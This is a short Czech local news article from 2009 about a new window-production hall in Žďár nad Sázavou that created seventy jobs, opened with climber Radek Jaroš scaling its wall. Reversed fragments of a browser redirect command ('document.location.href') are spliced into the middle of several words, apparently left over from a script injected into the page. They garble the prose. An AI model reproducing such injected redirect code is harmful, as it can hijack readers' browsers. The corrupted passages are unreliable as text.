Žďár nad Sázavou, zdar nad sazavou, aktuality, hala, pracovní místa
Rainbow page separator

V nové výrobní hale vzniklo sedmdesát pracovních míst

Pátek, 2. října 2009

Žďár nad Sázavou/ Celkem sedmdesát nových pracovních míst vzniklo v nedávno dokončené hale žďárské společnosti PKS. Ta budovu, která v průmyslové zóně zabírá zhruba pět tisíc metrů čtverečních, slavnostně otevřela ve čtvrtek 1. října. Její budování ale začalo již v říjnu loňského roku, projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové práce po[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom ještě dříve – v roce 2007.
V objektu, jehož výstavba přišla na zhruba s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dvacet milionů korun, bude nyní možné vyrábět při plném výkonu až osm tisíc kusů plas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tových oken měsíčně.

Na slavnostním uvedení do provozu byl kromě četných hostů z řad firem, jež se na stavbě podílely, a zástupců města i kraje, také známý novoměstský horolezec Radek Jaroš. Pokořitel celkem devíti osmitisícových vrcholů zdolal stěnu nové haly bez problémů během několika málo minut.